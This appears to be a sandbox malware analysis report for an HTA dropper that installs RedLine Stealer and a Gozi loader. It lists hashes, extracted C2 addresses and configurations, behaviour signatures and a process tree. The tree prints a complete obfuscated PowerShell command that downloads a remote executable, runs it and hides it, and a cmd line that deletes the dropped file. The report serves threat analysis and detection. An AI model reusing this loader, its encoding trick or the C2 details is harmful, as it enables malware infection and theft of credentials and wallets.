Analysis

max time kernel: 109s
max time network: 106s
platform: windows7_x64
resource: win7-20220715-en
resource tags: arch:x64, arch:x86, image:win7-20220715-en, locale:en-us, os:windows7-x64, system
submitted: 05-08-2022 01:33
Static task: static1
Behavioral task: behavioral1
Sample: 55.hta
Resource: win7-20220715-en
General

Target: 55.hta
Size: 12KB
MD5: 26ace4f34d7b5df03722125fe5280d4c
SHA1: 7b9e7c2c60e66ec42061752d707ab70c3c84187a
SHA256: e49c5359656eedbca5bffe8ab5aada0e0b3301c47e426b028f27d6e89027adad
SHA512: 5ad6cc4ae057d85a37f73b586ed0bbcf9857e7d918f302ba49772029d00bea6cb55d24f1249e33c0b2e05596fdaee813df0105032d96d91d56601b33b8555115
Malware Config

Extracted: gozi_ifsb
11111
trackingg-protectioon.cdn1.mozilla.net
194.76.225.168
194.76.224.242
base_path: /fonts/
build: 250240
exe_type: loader
extension: .bak
server_id: 50

Extracted: redline
bart
80.66.87.52:2500
auth_value: 7d4c7c8f7ce4a858768b38d88316bd46
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoC)
Processes:
  resource                                                                       yara_rule
  behavioral1/memory/1916-81-0x0000000000620000-0x0000000000664000-memory.dmp    family_redline

Blocklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  3     1876  powershell.exe

Downloads MZ/PE file

Executes dropped EXE (2 IoCs)
Processes:
  pid   process
  1916  bartor.exe
  1944  WinZip.exe

Loads dropped DLL (3 IoCs)
Processes:
  pid   process
  1876  powershell.exe
  696   cmd.exe
  696   cmd.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies Internet Explorer settings (1 IoC)
Processes:
  description  ioc                                                                                                       process
  Key created  \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main   mshta.exe
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid   process
  1876  powershell.exe
  1876  powershell.exe
  1876  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
  description              pid   process
  Token: SeDebugPrivilege  1876  powershell.exe
  Token: SeDebugPrivilege  1916  bartor.exe

Suspicious use of WriteProcessMemory (24 IoCs; each row below was recorded four times)
Processes:
  description                     pid   process         target process
  PID 1136 wrote to memory of 1876  1136  mshta.exe       powershell.exe
  PID 1876 wrote to memory of 1916  1876  powershell.exe  bartor.exe
  PID 1916 wrote to memory of 696   1916  bartor.exe      cmd.exe
  PID 696 wrote to memory of 1944   696   cmd.exe         WinZip.exe
  PID 1916 wrote to memory of 1580  1916  bartor.exe      cmd.exe
  PID 1580 wrote to memory of 1444  1580  cmd.exe         choice.exe
Processes

C:\Windows\SysWOW64\mshta.exe (PID 1136)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\55.hta"
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1876)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function EnIuqI($tUJRTxlOGTzBBb, $sVHQTsPPna){[IO.File]::WriteAllBytes($tUJRTxlOGTzBBb, $sVHQTsPPna)};function wteXJMZiCxLIHWyVK($tUJRTxlOGTzBBb){if($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32676,32684,32684))) -eq $True){rundll32.exe $tUJRTxlOGTzBBb }elseif($tUJRTxlOGTzBBb.EndsWith((bDbIUiomifraxsd @(32622,32688,32691,32625))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $tUJRTxlOGTzBBb}else{Start-Process $tUJRTxlOGTzBBb}};function jLwXZBeGxQAjckUU($EnIuqI){$OVWWVDSjZvvguN=(bDbIUiomifraxsd @(32648,32681,32676,32676,32677,32686));$XHGthyalbeewKOEQPWZ=(Get-ChildItem $EnIuqI -Force);$XHGthyalbeewKOEQPWZ.Attributes=$XHGthyalbeewKOEQPWZ.Attributes -bor ([IO.FileAttributes]$OVWWVDSjZvvguN).value__};function hjUZSOEutRzDQjOlSx($ioMMScKpkah){$iHEFhbXBYCwXIirUfY = New-Object (bDbIUiomifraxsd @(32654,32677,32692,32622,32663,32677,32674,32643,32684,32681,32677,32686,32692));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$sVHQTsPPna = $iHEFhbXBYCwXIirUfY.DownloadData($ioMMScKpkah);return $sVHQTsPPna};function bDbIUiomifraxsd($DUtYcPEQU){$RsPcedMKJvyiH=32576;$qkuvmRDebHfQ=$Null;foreach($hGnJeoBRHGIJa in $DUtYcPEQU){$qkuvmRDebHfQ+=[char]($hGnJeoBRHGIJa-$RsPcedMKJvyiH)};return $qkuvmRDebHfQ};function RtvXhZhq(){$veIehdmMqql = $env:AppData + '\';$qitNbz = $veIehdmMqql + 'bartor.exe'; if (Test-Path -Path $qitNbz){wteXJMZiCxLIHWyVK $qitNbz;}Else{ $iplTNEkBLCQEiP = hjUZSOEutRzDQjOlSx (bDbIUiomifraxsd @(32680,32692,32692,32688,32634,32623,32623,32625,32633,32627,32622,32629,32630,32622,32625,32628,32630,32622,32625,32627,32625,32623,32674,32673,32690,32692,32687,32690,32622,32677,32696,32677));EnIuqI $qitNbz $iplTNEkBLCQEiP;wteXJMZiCxLIHWyVK $qitNbz;};jLwXZBeGxQAjckUU $qitNbz;;;;;}RtvXhZhq;
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Users\Admin\AppData\Roaming\bartor.exe (PID 1916)
      Command line: "C:\Users\Admin\AppData\Roaming\bartor.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe (PID 696)
        Command line: "cmd.exe" /C start C:\Users\%UserName%\Downloads\WinZip.exe
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\Downloads\WinZip.exe (PID 1944)
          Command line: C:\Users\Admin\Downloads\WinZip.exe
          - Executes dropped EXE

      C:\Windows\SysWOW64\cmd.exe (PID 1580)
        Command line: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 7 & Del "bartor.exe"
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\choice.exe (PID 1444)
          Command line: choice /C Y /N /D Y /T 7
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 494KB
MD5: 0f2be4fe0362766dcf339d4c03326bc4
SHA1: 69e26e9e75e8a8359d232d8e14318b9235e1a828
SHA256: 2f96d468f1c62104047e67e8dcd2a8590924e99f85f5c009f348f67bd83e2529
SHA512: 8d3d86dd98c04fea1a212be212b155dec3895fb88806c6bc460820635179ca3e9f60296cf448d3054fcccd38c311097395d108e6481aba5c60a6308d9b785150
Filesize: 338KB
MD5: 468042278a3e4841d3e33ccca10d99ca
SHA1: 22532f37096a200d448420359c01bbebaaf6b820
SHA256: b92e9e2c758e32857506f9472cc51aec4b499afa6f703f7c40218e4e4258da86
SHA512: 4c85e54b26ee0540fa9350f92a85f7e254f3c11481f3a3099c96ce47b83963ed4661216b2c4109e76e94ee3821310e3a35b2e37fc076a13f9f663dc6bc992ebf